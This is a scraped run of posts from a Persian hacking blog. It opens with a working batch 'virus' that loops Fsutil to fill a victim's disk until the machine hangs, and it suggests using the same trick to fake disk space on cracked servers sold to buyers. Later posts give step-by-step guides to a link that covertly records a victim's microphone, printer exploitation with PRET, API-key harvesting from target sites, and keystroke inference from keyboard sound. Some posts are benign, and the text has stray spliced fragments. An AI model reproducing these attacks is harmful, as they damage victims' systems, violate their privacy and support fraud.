حالا میرسیم به نحوه ی پر کردن هارد سیستم قربانی از اطلاعات چرت و پرت

برای اینکار ما از دستور Fsutil استفاده میکنیم که خوشبختانه این دستور روی سیستم عامل های قدیمی هم موجوده و موجب میشه که ویروس ما روی همه ی سیستم عامل های ویندوزی اجرا بشه

یه بچ فایل ایجاد کنین و کدهای پایین رو داخلش قرار بدین

Cd %UserProfile%\Desktop
:Start
Fsutil file createnew %random%.bak %random%
Fsutil file createnew %random%.mp3 %random%
Fsutil file createnew %random%.mp4 %random%
Goto Start

وقتی که کدهارو قرار دادین با کلید های Ctrl + C اونارو داخل فایل ذخیره کنید و اونو اجرا کنین و سریع ببندید

بعد از اجرا و بستن یه نیم نگاه به صفحه ی دسکتاپتون بندازین تا بهتر متوجه بشین که این کدها دقیقا قراره چیکار کنن

در واقع این کدها میان یه فایل با اسم تصادفی و پسوند های bak و mp3 و mp4 فایل های چرت و پرت ایجاد میکنن که موجب میشه هارد سیستم قربانی از اطلاعات مزخرف پر بشه و اگه سیستم قربانی کم بیاره میتونه موجب هنگی سیستم طرفمون هم بشه.

همچنین میتونیم به جای استفاده از %random% از یه سایز بیشتر هم برای فایلی که قراره ایجاد بشه استفاده کنیم

Fsutil file createnew %random%.bak 999999999

مثلا کد بالا یه فایل معادل حجم یک گیگابایت ایجاد میکنه

اما این کدها کاربردای دیگه هم داره

به عنوان مثال اینروزا آدمایی هستن که سرور مجازی کرک میکنین و سرور های هارد دار رو میفروشن که با این روش میتونین فایل فیک روی سرور ایجاد کنن و سرورارو به خریدار اینجور سرور ها بفروشن.

در کل کدی که قرار دادم رو یه خرده دستکاری کنین و سعی کنین اهدافتون رو خودتون پیاده سازی کنید

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

ضبط صدای اطراف گوشی قربانی با لینک

سلام خدمت تمامی کاربران گل وبسایت تیم امنیتی dedsec

امروزه از مرورگر ها بسیار زیاد استفاده میشه و همه ما تقریبا بیشتر وقتمون رو داریم با سرچ کردن در اینترنت میگذرونیم ، مرورگر ها اطلاعات مهمی درون خودشون دارن مثل یوزر ها پسورد ها ، کوکی ها و… که با این تفاسیر میشه گفت بستر مناسبی برای انجام حملات هست. جاوا اسکریپت به هکر ها کمک میکنه که بتونن عملیات های مختلفی رو از طریق مرورگر روی سیستم قربانی انجام بدن مثل بدست آوردن لوکیشن قربانی ، ریدارکت کردن قربانی به صفحه جعلی و…. پس جاوا اسکریپت زبان بسیار مهم و حیاتی برای انجام حملات سمت مروگر هاست.

در مطالب گذشته راجب جاوا اسکریپت و حملاتی که میشه باهاش انجام داد صحبت کردیم ، حتما پیشنهاد میکنم دوستانی که میخوان در این نوع حملات مهارت کافی رو کسب کنن حتما شروع به یادگیری جاوا اسکریپت کنن چون بسیار بسیار مفید خواهد بود ، در این پست آموزشی ما با کمک SAyHello یک لینک میسازیم و بعد از فرستادن اون لینک برای قربانی و باز کردن اون لینک در مرورگر میکروفون قربانی شروع به ضبط صدا میکنه و صدای ضبط شده برای ما ارسال میشه.

خب بریم سراغ کارمون در قدم اول با دستور زیر ابزار رو دانلود میکنیم

بعد از دانلود ابزار وارد پوشه ابزار میشیم و با دستور زیر ابزار رو اجرا میکنیم

بعد از اجرای ابزار از ما میپرسه که از کدوم سرویس برای انجام حمله میخواهید استفاده کنید من اینجا serveo رو انتخاب میکنم (الان که من دارم این پست رو میزارم سرویس Serveo به دلیل فیشینگ موقتا غیر فعال هست و من پیشنهاد میکنم از Ngrok استفاده کنید) برای اینکه بتونم حمله خودم رو خارج از شبکه داخلی نیز اجرا کنم بعد از انتخاب serveo ما باید مشخص کنیم که بعد از اجرای لینک قربانی به چه سایتی ریدایرکت بشه که به صورت پیش فرض ابزار سایت یوتیوب رو در نظر میگیره بعد ، از ما راجب ساب دامین سوال میکنه که من دیفالت رو انتخاب میکنم و بعد از اون یک لینک برای ما نمایش داده که اون لینک رو ما باید برای قربانی ارسال کنیم (میتونید برای تمیز تر شدن کار از سایت های کوتاه کننده لینک نیز استفاده کنید)

بعد از اجرای لینک توسط قربانی ، قربانی باید دسترسی به میکروفون رو فعال کنه تا ابزار صدا های اطراف رو ضبط کنه و برای ما ارسال کنه

بعد از تایید دسترسی به میکروفون ابزار شروع به ارسال صدای های ضبط شده میکند

ابزار مرتب صدا های اطراف رو ضبط میکنه و میفرسته برای متوقف کردن Ctrl + C رو بزنید تا ابزار ضبط صدا رو قطع کنه و بعد از اون میتونید صدا های ضبط شده رو در پوشه ابزار ببینید

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

گرفتن عکس از سایت با CutyCapt

آموزش گرفتن عکس از سایت با CutyCapt

کالی لینوکس از بهترین سیستم عامل هاس تست نفوذ است که دارای ابزار های مختلفی برای تست امنیت و بالا بردن امنیت کاربر است به همین خاطر باید با ابزار های کاربردی و جالب ان اشنا بود، که ما در این اموزش می خواهیم یکی دیگر از این ابزار های کاربردی را معرفی کنیم و با استفاده از ان بتوانیم امنیت خود را در سطح بالاتری نگه داریم.

معرفی ابزار CutyCapt

این ابزار توسط کالی لینوکس در بخش ابزار ها معرفی شده است و به صورت پیشفرض در کالی لینوکس به صورت نصب شده وجود دارد و کاربرد ان برای گرفتن عکس از سایت بدون وارد شدن به ان با مرورگر ها است که با این کار درصورتی که سایت الوده باشد، هیچ مشکلی برای ما به وجود نخواهد امد و با امکاناتی که دارد می توانید به صورت مخفی از یک وب سایت عکس بگیرید و ان مشاهده نمایید.

برخی از امکانات

انتخاب یوزرایجنت
تنظیم پروکسی
غیر فعال کردن جاوا اسکریپت
افزودن کد های css
غیر فعال کردن نمایش تصاویر
تنظیم ابعاد تصاویر
….

نحوه استفاده از ابزار

این ابزار کاربردی با استفاده از دستور زیر که نام خود ابزار است می توانید ان را اجرا نمایید :

cutycapt

برای مشاهده راهنما از سویچ –help به صورت زیر استفاده می شود :

cutycapt –help

برای مثال برای گرفتن عکس از سایت باید به صورت زیر از دستور استفاده نمایید :

cutycapt –url=https://dedsec-hack.blog.ir –out=dedsec.png

در دستور بالا با سویچ –url و استفاده از = ادرس وب سایت را به همراه https یا http وارد کرده ایم.

و در بخش بعدی با سویچ –out= محل ذخیره و نام تصویر را انتخاب کرده ایم.

با زدن دستور بالا یک تصویر از وب سایت پن تست کور گرفته خواهد شد ،

و در مسیر /root با نام dedsec.png ذخیره می شود.

گرفتن عکس از سایت بدون مشخص شدن ای پی

برای مشخص نشدن ای پی شما در زمان عکس گرفتن از دستور زیر استفاده نمایید :

cutycapt –url=https://dedsec-hack.blog.ir –out=dedsec.png –http-proxy=127.0.0.1:8080 –javascript=off

در دستور بالا سویچ –http-proxy= افزوده شده است که در واقع ابزار با استفاده از پروکسی که شما به ان می دهید از سایت مورد نظر عکس می گیرد که با این کار ای پی شما در سایت تارگت مشخص نخواهد شد و در اخر با سویچ –javascript= جاوا اسکریپت را در سایت قبل از عکس گرفتن غیر فعال می کند.

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

آموزش نصب اوبونتو در ویندوز 10

اوبونتو یک سیستم عامل لینوکسی برپایه دبیان است که توانسته است محبوبیت زیادی بین کاربران خود داشته باشد، چرا که با استفاده از این سیستم عامل می توان از یک سیستم خانگی یا یک سرور استفاده کرد و از امکانات بسیار بالایی برخوردار است. به همین خاطر بسیاری به این سیستم عامل علاقه مند هستند اما نمی توانند به طور کامل سیستم عامل قبلی خود را کنار بگذارند و وارد اوبونتو شوند برای حل این مشکل راه هایی وجود دارد که بتوانید همزمان از هردو سیستم عامل استفاده کنید که در ادامه به این روش ها می پردازیم.

استفاده از سیستم عامل دلخواه در ماشین های مجازی

برنامه هایی مانند VMware ، hyper-v و … وجود دارند که با استفاده از ان ها می توانید در یک محیط مجازی ، سیستم عامل مورد نظر خود را نصب کنید وبرای مثال اگر سیستم عامل شما ویندوز است باید برنامه ماشین مجازی مورد نظر خود را نصب کنید و سپس درون ان سیستم عامل مورد نظر را نصب نمایید؛ که با این کار همزمان می توانید چندین سیستم عامل در سیستم داشته باشید. اما این کار می تواند مزیت ها و معایبی داشته باشد که ممکن است برای ما محدودیت ایجاد کند.

معایب :

نیاز به فضایه ذخیره سازی بالا برای نگه داری اطلاعات سیستم عامل ها
استفاده همزمان از منابع سخت افزاری و مشکل کندی سیستم
نیاز به منابع کافی برای استفاده
دارای برخی محدودیت ها

روش دوم برای نصب اوبونتو

این روش بهترین راه برای نصب و استفاده از اوبونتو در ویندوزاست که این امکان فقط در ویندوز 10 وجود دارد ، در واقع ما یک نسخه بسیار کم حجم از اوبونتو را از Microsoft Store دریافت و نصب می کنیم و مزیت های بسیار زیادی نسبت به روش مجازی سازی دارد که به ان ها میپردازیم.

مزیت ها :

نیاز نداشتن به مجازی سازی
استفاده از فضای ذخیره سازی بسیار کم
اجرا و دسترسی سریع
استفاده از منابع سخت افزاری بسیار کم

نحوه نصب اوبونتو در ویندوز 10

در ابتدا ویندوز خود را به اخرین نسخه اپدیت نمایید و سپس پاورشل را در ویندوز با دسترسی Administrator اجرا کنید؛ برای این کار کافیست از بخش جستجو ویندوز PowerShell را جستجو کنید و بر روی ان کلیک راست نمایید سپس run as administrator را بزنید و بعد از اجرا ان ، دستور زیر را در پاور شل وارد نمایید.

Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux

سیستم را یک بار ریاستارت کنید. به Microsoft Store رفته و ubuntu را جستجو کنید.

نسخه ubuntu مورد نظر را انتخاب کنید و بر روی get بزنید تا دانلود اغاز شود.

برای مشاهده ubuntu در فروشگاه مایکروسافت می توانید از لینک زیر هم استفاده نمایید.

https://www.microsoft.com/en-us/p/ubuntu/9nblggh4msv6?activetab=pivot:overviewtab

بعد از دستور بالا و نصب شدن اوبونتو در ویندوز 10 کافیست وارد cmd شوید و دستور ubuntu را بزنید یا از بخش جستجو ubuntu را جستجو نمایید و مانند یک برنامه خواهید دید که اجرا خواهد شد و دسترسی کامند لاین به ان خواهید داشت. به استفاده از این سیستم عامل می توانید از دستوراتی مانند : git ، ssh ، bash ، apt و … استفاده نمایید.

لینک های دانلود

Ubuntu 18.04

Ubuntu 16.04

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

استخراج کلید api

بسیاری از وب سایت های برای افزایش عملکرد خود از سرویس های مختلفی استفاده می کنند که توسط api ها با هم ارتباط دارند، به همین دلیل اهمیت زیادی پیدا کرده اند برای مثال اگر وب سایتی از ریکپچا گوگل استفاده کرده باشد حتما از گوگل api گرفته است و برای ان یک کلید خصوصی دارد؛ ما در این اموزش می خواهیم api های استفاده شده در وب سایت تارگت خود را مشخص کنیم و در نهایت بتوانیم کلید ان را پیدا کنیم برای اینکار از ابزار های مختلفی می توان استفاده کرد که به معرفی یکی از ان ها می پردازیم.

معرفی ابزار SecretX

همانطور که گفته شد با استفاده از این ابزار می توانید Api های استفاده شده در وب سایت را پیدا کنید و کلید ان ها را از ابزار بگیرید، سپس با استفاده از ان دسترسی بدست امده از API در صورت امکان سطح دسترسی خود را بالا برده و تست نفوذ خود را انجام دهید. این ابزار به زبان پایتون نسخه 3 نوشته شده و به راحتی قابل استفاده در انواع سیستم عامل ها است که نحوه کار با ان هم بسیار ساده است که در ادامه با این ابزار بیشتر اشنا خواهید شد.

نکته : دقت کنید برای بدست اوردن کلید api قبل از تست امنیتی به هانی پات ها دقت کنید تا دچارمشکل نشوید.

نصب و استفاده از ابزار در لینوکس

در ابتدا باید از طریق لینک گیت هاب SecretX ، مانند دستور زیر ابزار را دانلود کنید :

git clone
https://github.com/xyele/secretxSecretX

سپس وارد پوشه دانلود شده ابزار که فایل های اصلی در ان قرار دارند شوید :

cd secretxSecretX

حال با دستور زیر پیشنیاز های ابزار را قبل از اجرا و بدست اوردن کلید api های وب سایت نصب نمایید :

python3 -m pip install -r requirements.txt

بعد از اتمام کار می توانید با استفاده از پایتون 3 ابزار را اجرا کنید :

python3 secretx.py

با استفاده از دستور زیر می توانید لیست وب سایت هایی که

کنترل ویندوز از راه دور با ابزار PsTools

می خواهید کلید api های ان ها را پیدا کنید وارد لیست نمایید :

python3 secretx.py –threads 20 –list site.txt

در دستور بالا با استفاده از سویچ –list لیست ادرس وب سایت های مورد نظر خود را وارد ابزار کرده ایم.

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

کدهای مخفی گوشی اندروید

*#۰۶# – شماره سریال گوشی شما که بر روی تمامی گوشی های موبایل کار می کند

*#۰*# – وارد شدن به منوی سرویس های مخفی در تمامی گوشی های موبایل سامسونگ برای تست بخش های مختلف گوشی موبایل

*#*#۴۶۳۶#*#* – اطلاعات تلفن، میزان مکالمه و وضعیت باتری

*#*#۳۴۹۷۱۵۳۹#*#* – مشخصات دوربین گوشی موبایل
*#*#۲۷۳۲۸۲*۲۵۵*۶۶۳۲۸۲*#*#* – بکاپ گیری فوری از تمامی اطلاعات

*#*#۱۹۷۳۲۸۶۴۰#*#* – فعالسازی وضعیت تست برای تعمیرات

*#*#۲۳۲۳۳۹#*#* – تست وایرلس گوشی موبایل

*#*#۲۶۶۴#*#* – تست تاچ اسکرین گوشی موبایل

*#*#۱۱۱۱#*#* – نمایش نسخه اف تی ای گوشی موبایل

*#۱۲۵۸۰*۳۶۹# – مشخصات نرم افزار و سخت افزار گوشی موبایل

*#۳۰۱۲۷۹# – منوی کنترل اینترنت گوشی موبایل

*#*#۰۸۴۲#*#* – تست ویبره گوشی موبایل

*#۹۰۹۰# – منوی عیب یابی گوشی موبایل

*#۸۷۲۵۶۴# – تست ورودی یو اس بی گوشی موبایل

*#۹۹۰۰# – وضعیت سیف مود سیستم

*#۷۴۶۵۶۲۵# – مشاهده وضعیت قفل گوشی موبایل شما

*#*#۷۷۸۰#*#* – ریست کردن تمامی اطلاعات گوشی موبایل و برگشتن به حالت کارخانه ( زدن این کد به هیچ وجه توصیه نمی شود )

*۲۷۶۷*۳۸۵۵# – پاک کردن همه اطلاعات موجود بر روی گوشی موبایل ( زدن این کد به هیچ وجه توصیه نمی شود )

##۷۷۶۴۷۲۶ – منوی مخفی گوشی موتورولا دروید

*#*#۲۷۳۲۸۳*۲۵۵*۶۶۳۲۸۲*#*#* – بکاپ گیری سریع از گوشی اندروید

*#*#۲۳۲۳۳۸#*#* – نمایش مک آدرس وای فای گوشی موبایل شما

*#*#۱۴۷۲۳۶۵#*#* – تست سریع جی پی اس

*#*#۱۵۷۵#*#* – تست پیشرفته جی پی اس

*#*#۰*#*#* – تست ال سی دی گوشی موبایل

*#*#۰۲۸۹#*#* – تست صدا

*#*#۲۶۶۳#*#* – نمایش نسخه تاچ اسکرین گوشی موبایل

*#*#۰۵۸۸#*#* – تست سنسور شتاب سنج گوشی موبایل

*#*#۳۲۶۴#*#* – نمایش نسخه رم گوشی موبایل

*#*#۲۳۲۳۳۱#*#* – اجرای تست بلوتوث

*#*#۷۲۶۲۶۲۶#*#* – تست آنتن گوشی موبایل

*#*#۴۴۳۳۶#*#* – نمایش زمان ساخت گوشی موبایل

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

آموزش نفوذ به پرینتر با ابزار PRET

سلام خدمت تمامی کاربران عزیز تیم امنیتی dedsec

در شبکه ما تجهیزات مختلفی داریم مثل سرور ، روتر ، سویچ ، کلاینت با سیستم عامل ها مختلف و…. که هر کدوم از این تجهیزات برای هکر ها مهم هستن و هکر ها برای نفوذ به شبکه این تجهیزات رو مورد بررسی خودشون قرار میدن ، اما ما در این مطلب کاری به سرور ، روتر ، سویچ و…. نداریم ما اینجا میخایم راجب پرینتر ها صحبت کنیم که در شبکه ها بسیار زیاد ازشون استفاده میشه و اطلاعات بسیار مهمی هم در حافظه خودشون دارن اما ادمین های شبکه توجه لازم رو به پرینتر ها ندارن و همین بی توجهی باعث میشه هکر ها به اطلاعات مهمی دسترسی پیدا کنن که بسیار میتونه خطرناک باشه ، اگر بخوام یه مثال بزنم در شرکت ، اداره یا سازمان شما روزانه از طریق پرینتر ها اطلاعات زیادی چاپ میشه مثل نامه های محرمانه ، اطلاعات مالی و… که دسترسی به این اطلاعات از طریق پرینتر ممکن هست ، تمامی اینا رو گفتیم که برسیم به این سوال که آیا ما میتونیم یک پرینتر رو هک کنیم؟ چگونه میشه یک پرینتر رو هک کرد ؟ اگر میخواهید به جواب این سوالات برسید پس تا آخر این مطلب با ما باشید…

خب بریم سراغ کارمون برای شروع من ابزار Printer Exploitation Toolkit رو دانلود میکنم ، این ابزار به ما این امکان رو میده که بتونیم پرینتر ها رو از نظر امنیتی بررسی کنیم ، ابزار امکانات بسیار خوبی داره که اگر توضیحات کامل تری میخواید حتما گیت هاب این ابزار رو بخونید (

لینک گیت هاب ابزار Printer Exploitation Toolkit)

بعد از دانلود ابزار با دستور زیر متعلقات ابزار رو نصب میکنیم

بعد از نصب متعلقات ابزار وارد پوشه ابزار میشیم و با سویچ h- میتونیم راهنما ابزار رو مشاهده کنیم

میرسیم به اصلی ترین بخش کار که مرحله نفوذ است نکته ای که در این مرحله بسیار مهمه اینه که شما تعیین کنید که از کدام زبان چاپگر میخواهید برای سوء استفاده ، استفاده کنید، زبان چاپگر برای سوء استفاده باید یکی از این زبان ها Ps , Pjl , Pcl باشد، این سه زبان چاپگر توسط همه پرینتر ها پشتیبانی نمیشود ، برای حمله ما دستور زیر رو وارد میکنیم که به جای ای پی ای پی پرینتر مورد نظر و به جای Pjl زبان چاپگری که میخواهید برای سوء استفاده ، استفاده کنید رو وارد میکنید.

بسیار عالی دسترسی ما به پرینتر مورد نظرمون برقرار شد برای دیدن دستورات کافیه help رو بزنید

شما کار های مختلفی رو میتونید روی پرینتر انجام بدید که لیست دستورات رو در عکس بالا مشاهده میکنید من برای تست با دستور زیر به چاپگر دستور چاپ یک نوشته رو میدم که البته شما میتونید یک فایل عکس هم بهش بدید که شروع به چاپ کنه

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

آموزش تشخیص کلید فشرده شده کیبورد از طریق صدا

سلام خدمت تمامی کاربران گل سایت dedsec

همونطور که از عنوان مطلب هم مشخصه قراره راجب موضوعی صحبت کنیم که خیلی هاتون شاید در نگاه اول بگید که اصلا مگه ممکنه ؟ یا شایدم خیلی از شماها قبلا بهش فکر کردید اما به خودتون گفتید که کار سختی هست و یا شدنی نیست و بیخیالش شدید در علم هکینگ قرار نیست که ما همیشه از طریق هک سیستم عامل یا وب یا هر چیز دیگه ای بتونیم به اطلاعاتی که میخواهیم دست پیدا کنیم و خیلی وقت ها با حالت هایی که شاید حتی فکرشو نکنید بتونید اطلاعات مهمی رو به دست بیارید ، فک کنید از طریق صدای کلید های کیبورد شما متوجه بشید که اون شخص چه کلیدی روی کیبورد فشار داده ، الان با خودتون بگید که این چیزا ممکن نیست و بخواهید این مطلب رو ادامه ندید اما باید بگم که عجله نکنید و تا آخر این پست با ما همراه باشید تا متوجه بشید آیا اینکار ممکنه یا نه؟

معرفی ابزار Kbd Audio :

این ابزار بسیار قدرتمند صدا های تولید شده کلید های کیبورد رو از طریق میکروفون کپچر میکنه و با انالیز صدا های دریافتی به ما میگه که قربانی الان کدوم کلید رو فشار داده ، ابزار Kbd Audio هم محیط کامندی داره و هم محیط گرافیکی که من یه تصویر از محیط گرافیکیش رو براتون قرار دادم

خب میریم سراغ کارمون در قدم اول با دستور زیر ابزار Kbd Audio رو دانلود میکنیم

بعد از دانلود وارد پوشه ابزار میشیم و با دستور زیر SubModule های ابزار رو اپدیت میکنیم

در ادامه یک پوشه به اسم build میسازیم و وارد پوشه میشیم و دستور زیر رو وارد میکنیم بعد از اتمام کار cmake ما دستور make رو وارد میکنیم

خب دیگه ابزار آماده استفاده است برای شروع کپچر صدا ما دستور زیر رو وارد میکنیم و میبینید که ابزار در حال کپچر و انالیر هست و کلید هایی که ما روی کیبورد فشار دادیم رو بهمون نشون میده

در پایان کار هم یک فایل خروجی برای ما ذخیره شده که با دستور زیر میتونیم فایل رو مجدد پلی کنیم و کلید های فشرده شده رو مشاهده کنیم

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

آموزش تحلیل و بررسی برنامه های اندروید

بسیاری از ما با سیستم عامل اندروید سر و کار داریم چرا که بسیاری از دستگاه های موبایل با سیستم عامل اندروید هستند پس برای امنیت خود همیشه قبل از نصب هر برنامه باید یک تحلیل دقیق بر روی برنامه داشت که ما در این اموزش ابزاری برای اینکار معرفی میکنیم که میتوانید با استفاده از ان تحلیل کاملی بر روی فایل های apk انجام دهید.

معرفی ابزار Quark Engine

این ابزار که به زبان پایتون 3 نوشته شده است و همانطور که گفته شد برای تحلیل و بررسی برنامه های اندرویدی استفاده می شود . بعد از بررسی در صورت وجود بدافزار در فایل apk ابزار بدافزار شما را امتیاز دهی می کند و می توانید قبل از نصب هر برنامه ای از ان استفاده کنید تا دیگر حتی نیازی به نصب انتی ویروس ها و برنامه های امنیتی دیگر در دستگاه موبایل خود نشوید.

نحوه نصب ابزار و بررسی برنامه اندروید

در ابتدا ابزار را از لینک گیت هاب با دستور زیر در ترمینال ان دریافت نمایید :

git clone
https://github.com/quark-engine/quark-engine

سپس وارد دایرکتوری ابزار شوید :

cd quark-engine/quark

در مرحله بعد دستورات زیر را برای نصب پیشنیاز های ابزار وارد کنید :

pipenv install –skip-lock

pipenv shell

حال می توانید با وارد کردن دستور زیر در ترمینال ابزار را برای بررسی برنامه های مورد نظر خود اجرا کنید :

quark

برای کارکرد ابزار به مثال زیر توجه کنید :

quark -a app.apk -r rules/ -s

در دستور بالا با استفاده از سویچ -s فایل Apk یا همان برنامه اندروید که می خواهیم ان را بررسی کنیم وارد می کنیم و با استفاده از سویچ -s گذاراش های ان را دریافت می کنیم؛ در اخر هم از سویچ -r باید استفاده شود که برای بررسی سطح دسترسی فایل است ، دقت داشته باشید به همراه ادرس دایرکتوری ان باید وارد شود.

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

۱۴ فیلم و سریال برتر با موضوع هک

سلام خدمت تمامی کاربران عزیز وبسایت تیم امنیتی dedsec

اگر شما جزو اشخاصی باشید که علاقه مند به حوزه هک هستید قطعا همیشه به دنبال دیدن فیلم و سریال ها با موضوع هک بودید و دیدن این فیلم ها علاوه بر انگیزه لذت بسیار زیادی رو برای اشخاص علاقه مند خواهد داشت ، در این پست ما قصد داریم برترین فیلم و سریال با موضوع هک رو به شما معرفی کنیم

در سالهای اخیر با گسترش کامپیوتر، اینترنت و فناوری های مرتبط با آنها، صنعت سینما نیز به سمت موضوعات جدید مرتبط با آنها رفته است. کارگردانان و نویسنده های زیادی تصمیم به ساختن فیلم با موضوع هک و دیگر سوژه های فضای مجازی گرفته اند. این نوع فیلم ها که به فیلم سایبری نیز معروف هستند، توانسته اند مخاطبان زیادی به خود جلب کنند. فیلم ماتریکس که در سال ۱۹۹۹ساخته شد یکی از اولین فیلم‌های تاثیرگذار با موضوع کامپیوتر است. در ادامه نیز سریال و فیلم های سینمایی زیادی با موضوع کامپیوتر ساخته شده که هر یک از آن ها به یک یا چند مورد از جنبه های مختلف دنیای فناوری اطلاعات مانند برنامه نویسی، زندگینامه بزرگان و پیشگامان این حوزه مانند استیو جابز، هک، امنیت، هوش مصنوعی و … پرداخت اند. بخش زیادی از این فیلمها در دسته فیلم های امنیتی و فیلم های سایبری جای میگیرند. برای این که این فیلم‌ها برای شما جذاب باشند، نیازی نیست حتما در زمینه کامپیوتر و فناوری اطلاعات و امنیت تحصیل کرده یا مهارت داشته باشید و یا شغل تان در این زمینه باشد. امروزه فناوری اطلاعات جزیی جداناپذیر از زندگی همه ما شده است و بیشتر جنبه های سبک زندگیمان را تغییر داده است . انواع فیلم سینمایی با موضوع کامپیوتر تلاش کرده اند تا هم به نکات مثبت فناوری های مختلف کامپیوتری بر زندگی ما بپردازند و هم با بررسی چالش های مختلفی که ممکن است در آینده و به دلیل به کارگیری این فناوری ها برایمان به وجود آید را پوشش دهند. استفاده از کامپیوتر و هوش مصنوعی اگر چه کمک زیادی به ما کرده است و بسیاری از پیشرفت‌های دنیای امروز بدون وجود این فناوری ها غیر ممکن است، اما زندگی ما را با چالش هایی جدیدی نیز روبرو نموده است. یکی از اولین خطراتی که در ذهن نویسنده های مختلف شکل گرفت خطر پیشرفت بسیار زیاد هوش مصنوعی و ایجاد ربات های قدرتمندی بود که توانسته بودند بر انسان ها مسلط شود. موضوع دیگری که فیلم های زیادی به آن پرداخته اند امنیت در محیط سایبری و استفاده از آنها در خانه های هوشمند متصل به اینترنت است. به این نوع فیلمها فیلم امنیتی نیز گفته میشود. در این دسته از فیلم ها نشان داده شده است که چگونه این فناوری ها میتوانندحریم شخصی ما را به خطر بیاندازند و اطلاعات مهم ما مانند حساب بانکی را در معرض خطر قرار دهند. با این حال توجه داشته باشید برخی از این موضوعات و رویدادها تخیلی بوده و در دنیای واقعی امکانپذیر نیست و یا فعلا امکان رخ دادن یا عملی کردن آنها وجود ندارد، ولی چه بسا در آینده به وقوع بپوندند. برای این که شما نیز با خطرات جدید دنیای مدرن روبرو شوید و با فناوری های آینده آشنا شوید و علاوه بر این ها، از تماشای یک فیلم زیبا و پر هیجان لذت ببرید.

در ادامه قصد داریم شما را با بهترین فیلم ها و سریال هایی آشنا نماییم که موضوعی در ارتباط با کامپیوتر، هک و امنیت دارند. در این فهرست بهترین فیلم ها با موضوع هک ارائه شده اند. ما تلاش کرده ایم به بررسی فیلم هایی تاثیرگذار در این حوزه بپردازیم که در گذشته توانسته اند نظر منتقدان و طرفداران سینما را به خود جلب نمایند. با این حال از فیلم های جدیدی که از استقبال خوبی برخوردار بودهاند، نیز غافل نشده ایم. پیشنهاد میکنیم برای یافتن بهترین فیلم هکری نگاهی به فهرست ما بیندازید.

برترین فیلم ها هکری ایرانی و خارجی

فیلم با موضوع هک

۱-

ماتریکس ۱۹۹۹

ماتریکس یکی از پرطرفدارترین فیلم ها در حوزه امنیت سایبری و هک میباشد که در آن ذهن انسان هک میشود. این فیلم آنقدر جذاب و دیدنی است که قدیمی بودن آن اصلا حس نمیشود و هنوز هر کسی آن را تماشا میکند تجربه جدید و زیبایی کسب میکند. همچنین جلوه های ویژه فیلم ماتریکس نیز خیلی زیبا ساخته شده.

برای دانلود فیلم ماتریکس ۱۹۹۹ کلیک کنید

فیلم با موضوع هک

۲-

فیلم سینمایی انقلاب سیستم عامل

این فیلم که درواقع یک مستند میباشد. در مورد فردی است که با طراحی و ساخت سیستم عامل لینوکس، دنیای کامپیوتر و نرم افزار را به مرحله جدیدی وارد کرد. در این مستند شما شاهد تلاش های Michael Tiemann و تیم قدرتمند او در راستای فعالیت های خستگی ناپذیر آنها برای بهبود هرچه بیشتر دنیای سیستم عامل ها خواهید بود. فیلم انقلاب سیستم عامل یک مستند جذاب و دیدنی در مورد دنیای سیستم عامل ها میباشد.

برای دانلود فیلم انقلاب سیستم عامل کلیک کنید

فیلم با موضوع هک

۳-

فیلم سینمایی طبقه سیزدهم
خلاصه داستان فیلم در مورد یک دانشمند علوم کامپیوتری بنام هانن فالر»، مساله‌ای خیلی مهم را کشف کرده است. او قصد دارد این کشف جدیدش را به همکارش دوگلاس هال» بگوید، اما احساس می کند کسی به دنبال اوست و از این رو پیغامش را در دنیای کامپیوتری مجازی و موازی با واقعیت برای همکارش می گذارد. فالر همان شب در دنیای واقعی به قتل می رسد و دوگلاس تنها متهم پرونده قتل اوست. او وارد دنیای مجازی می شود تا نامه‌ی همکارش را بیابد، و می فهمد که حقیقت ناگوارتر از آنچه که انتظار داشته است.

برای دانلود فیلم طبقه ۱۳ کلیک کنید

فیلم و سریال با موضوع هک

۴-

فیلم سینمایی هکر ۲۰۱۶
این فیلم نیز صحنه های جالبی از هکر بازی دارد. داستان در مورد پسری به نام الکس میباشد که از بچگی زیاد اهل اجتماع و دوستی نبوده و در خانه با کامپیوتر مادرش بزرگ میشود و کم کم با آن ارتباط برقرار میکند. در جوانی به واسطه مهارتی که از کامپیوتر کسب کرده شروع به کسب درآمد از دنیای اینترنت میکند و…

برای دانلود فیلم هکر ۲۰۱۶ کلیک کنید

فیلم و سریال با موضوع هک

۵-

فیلم سینمایی بازی تقلید – انیگما
فیلم بازی تقلید به زندگی آلن تورینگ، ریاضیدان و دانشمند علوم کامپیوتر سرشناس بریتانیایی میپردازد. بخش عمده ای از دقایق فیلم روی ماجراهای جنگ جهانی دوم و تلاش تورینگ و گروهش برای شکستن کد ماشین انیگما که نازی ها از آن برای ارسال پیام های سری خود استفاده میکنند، تمرکز دارد. اگر به رمزنگاری و شکستن آن علاقه دارید این فیلم میتواند ساعت ها شما را سرگرم کند.

برای دانلود فیلم بازی تقلید کلیک کنید

فیلم و سریال با موضوع هک

۶-

فیلم سینمایی We Are Legion: The Story of the Hacktivists
این فیلم یا درواقع باید بگوییم مستند به گروه هکری آنانیموس یا ناشناس میپردازد. این گروه از بزرگترین گروه های هکری میباشد که شامل متخصصان امنیتی و هکرهای حرفه از سراسر نقاط دنیا میباشد. در این مستند شما در مورد عقاید و جنبش کلی این گروه و منشا و نحوه شکل گیری این گروه اطلاعات کسب میکنید.

برای دانلود فیلم Wre Are Legion کلیک کنید

فیلم و سریال با موضوع هک

۷-

فیلم سینمایی Snowden
